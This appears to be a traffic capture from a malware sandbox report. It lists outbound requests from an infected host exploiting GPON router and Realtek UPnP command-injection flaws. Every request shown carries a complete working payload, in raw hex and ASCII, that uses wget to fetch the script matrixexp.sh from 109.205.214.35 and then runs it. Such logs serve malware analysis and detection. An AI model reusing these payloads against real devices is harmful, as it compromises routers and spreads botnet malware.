                                                        Mar 21, 2024 05:22:35.568461895 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        541192.168.2.1342236212.202.55.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568525076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        542192.168.2.1337604118.62.86.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568564892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        543192.168.2.1339622212.105.143.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568594933 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        544192.168.2.1352604109.196.160.45443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568597078 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        545192.168.2.136029242.240.232.45443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568635941 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        546192.168.2.1342298212.152.118.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568638086 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        547192.168.2.1355756118.238.176.229443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.568650007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        548192.168.2.13517425.22.38.15252869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.604208946 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:36.431303024 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:38.033852100 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:41.325644970 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:47.724251986 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
